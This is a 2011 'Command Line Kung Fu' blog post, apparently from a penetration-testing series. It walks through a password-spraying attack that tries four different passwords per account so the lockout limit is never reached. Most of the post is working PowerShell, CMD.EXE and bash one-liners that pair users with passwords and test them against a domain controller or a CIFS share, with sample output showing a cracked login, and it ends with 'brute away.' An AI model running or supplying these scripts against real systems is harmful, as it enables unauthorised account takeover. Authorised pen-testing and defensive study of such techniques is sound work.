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Episode #162: Et Tu Bruteforce

published on 2011-11-15 10:00:00 UTC by Tim Medin @timmedin
Tim is looking for a way in

A few weeks ago I got a call from a Mr 53, of LaNMaSteR53 fame from the pauldotcom blog. Mister, Tim "I have a very cool first name" Tomes was working on a way to brute force passwords. The scenario is hundreds (or more) accounts were created all (presumably) using the same initial password. He noticed all the accounts were created the same day and none of them had ever been logged in to.

To brute force the passwords a subset of a large password dictionary is used tried against each account, but the same password was never used twice. This effectively bypasses the account lockout policy (5 failed attempts) and allows a larger set of passwords to be tested without locking out any accounts.

So instead of this scenario:
user1 - password1, password2, password3, password 4
user2 - password1, password2, password3, password 4
user3 - password1, password2, password3, password 4

We do it this way:
user1 - password1, password2, password3, password4
user2 - password5, password6, password7, password8
user3 - password9, password10, password11, password12

The effectiveness of this method is based on the assumption that each account was created with the same default password. Instead of testing 4 passwords, we can test 4 * # of users. So for 1000 accounts that means 4000 password guesses instead of just 4.

To pull this off we need to read two files, a user list and a password list. We need to take the first user and the first four passwords, then the send user and the next four passwords, and so on. This is the command to output the username and password pairs.

PS C:\> $usercount=0; gc users.txt | 
% {$user = $_; gc passwords.txt -TotalCount (($usercount * 4) + 4) |
select -skip ($usercount++ * 4) } | % { echo "$user $_" }

user1 password1
user1 password2
user1 password3
user1 password4
user2 password5
user2 password6
user2 password7
user2 password8
user3 password9

If we wanted to test the credentials against a domain controller we can do this:

PS C:\> $usercount=0; gc users.txt | % {$user = $_; 
gc passwords.txt -TotalCount (($usercount * 4) + 4) | select -skip ($usercount++ * 4) } |
% { net use \\mydomaincontroller\ipc$ /user:somedomain\$user $_ 2>&1>$null;
if ($?) { echo "This works $user/$_ "; net use \\mydomaincontroller\ipc$ /user:$user /del } }

This works user7/Password30


When Pen Testing you many times get access to CMD.EXE only. The PowerShell interfaces are a bit flaky, and many times the systems that are initially compromised don't have it installed so we need to rely on CMD.EXE.

C:\> cmd /v:on /c "set /a usercount=0 >NUL & for /F %u in (users.txt) do @set
/a passcount=0 >NUL & set /a lpass=!usercount!*4 >NUL & set /a upass=!usercount!*4+4
>NUL & @(for /F %p in (passwords.txt) do @(IF !passcount! GEQ !lpass! (IF !passcount!
LSS !upass! (@echo %u %p))) & set /a passcount=!passcount!+1 >NUL) & set /a
usercount=!usercount!+1 >NUL"

user1 password1
user1 password2
user1 password3
user1 password4
user2 password5
user2 password6
user2 password7
user2 password8
user3 password9

We start off enabling delayed variable expansion as usual. The usercount is initialized to 0 and it will be used to keep track of how many users have been attempted so far. We need this number to determine the proper password range to use. The users.txt file is then read via a For loop. Inside this (outer) For loop the passcount variable is set to 0. The passcount variable is used to keep track of where we are in the password file so we only use the 4 passwords we need. Related to that, the lower bound (lpass) and the upper bound (upass) are set so we know the range of the 4 passwords to be used. Now it is (finally) time to read the password file.

Another, inner, For loop is used to read through the password file. A pair of If statements are used to make sure the current password is in the proper bounds, and if it is, it is output. The passcount variable is then incremented to keep track of our count. After we go through the entire password file we increment the usercount. The process starts all over using the next user read from the file.

All we need to do now is Frankenstein this command with other Tim's command.

C:\> cmd /v:on /c "set /a usercount=0 >NUL & for /F %u in (users.txt) do @set
/a passcount=0 >NUL & set /a lpass=!usercount!*4 >NUL & set /a upass=!usercount!*4+4
>NUL & @(for /F %p in (passwords.txt) do @(IF !passcount! GEQ !lpass! (IF !passcount!
LSS !upass! (@net use \\DC01 /user:mydomain\%u %p 1>NUL 2>&1 && @echo This works
%u/%p && @net use /delete \\DC01\IPC$ > NUL))) & set /a passcount=!passcount!+1 >NUL)
& set /a usercount=!usercount!+1 >NUL"

This works user7/Password30

There you go, brute away.

Hal is looking for a way out

The basic task of generating the username/password list is pretty easy for the Unix folks because we have the "paste" command that lets us join multiple files together in a line-by-line fashion. The only real trick here is repeating each username input four times before moving on to the next username.

The first way that occurred to me to do this is with awk:

$ paste <(awk '{print; print; print; print}' users.txt) passwords.txt 
user1 password1
user1 password2
user1 password3
user1 password4
user2 password5

Here I'm using the bash "<(...)" notation to include the output of our awk command as a file input for the "paste" command. The awk itself just uses multiple print statements to emit each line four times.

Really all the awk is doing for us here, however, is to act as a short-hand for a loop over our user.txt file. We could dispense with the awk an just use shell built-ins:

$ paste <(while read u; do echo -e $u\\n$u\\n$u\\n$u; done <users.txt) passwords.txt 
user1 password1
user1 password2
user1 password3
user1 password4
user2 password5

Aside from using a while loop instead of the awk, I'm also using a single "echo -e" statement to output all four lines, rather than calling echo multiple times. I could have done something similar with a single print statement in the awk verson, but somehow I think the "print; print; print; print" was clearer and more readable.

By the way, some of you may be wondering why I have newlines ("\n", rendered above as "\\n" to protect the backwhack from shell interpolation) after the first three $u's but not after the last one. Remember that echo will automatically output a newline at the end of the output, unless we use "echo -n".

But now that we have our username/password list, what do we do with it? Unfortunately, the SMBFS tools for Unix/Linux don't include a working equivalent for "net use". So we'd have to try mounting a share the old-fashioned way in order to test the username and password combos:

paste <(awk '{print; print; print; print}' users.txt) passwords.txt |
while read u p; do
mount -t cifs -o domain=mydomain,user=$u,password=$p \
//myshare /mnt >/dev/null 2>&1 \
&& echo $u/$p works && umount /mnt

If the mount command succeeds then the echo command will output the username and password. Then we'll call umount to unmount the share before moving on to the next attempt. It's kind of hideous, but it will work.

Oh well, at least it's more readable than that CMD.EXE insanity Tim threw down...
Article: Episode #162: Et Tu Bruteforce - published over 13 years ago.

Published: 2011 11 15 10:00:00
Received: 2021 06 06 09:05:29
Feed: Command Line Kung Fu
Source: Command Line Kung Fu
Category: News
Topic: Security Tooling
Views: 4

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